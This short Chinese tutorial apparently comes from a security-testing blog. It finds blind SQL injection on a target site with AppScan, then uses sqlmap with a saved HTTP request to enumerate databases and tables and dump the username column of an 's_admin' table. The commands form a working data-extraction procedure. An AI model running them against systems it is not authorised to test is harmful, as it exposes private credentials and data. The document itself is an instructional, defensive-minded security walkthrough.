做安全测试时,先用appscan扫描目标网站,爆出sql盲注的风险
然后使用sqlmap专业工具来扫描分析漏洞
GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover toolAutomatic SQL injection and database takeover tool - GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
https://github.com/sqlmapproject/sqlmap把上图所示部分(请求行+请求头+请求体)存储为test.txt,放到与sqlmap.py同路径下
- 查看所有数据库
python sqlmap.py -r E:\sqlmap-master\test.txt --dbs 
结果中有parameter说明确实有漏洞
所有数据库信息
- 查看指定数据库的所有表信息
python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn --tables 
- 查看指定数据库,表的所有列信息
python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn -T s_admin --columns 
- 查看指定数据库,表,列的信息
python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn -T s_admin -C username --dump 
太可怕了,数据库数据暴漏了,网络安全人人有责!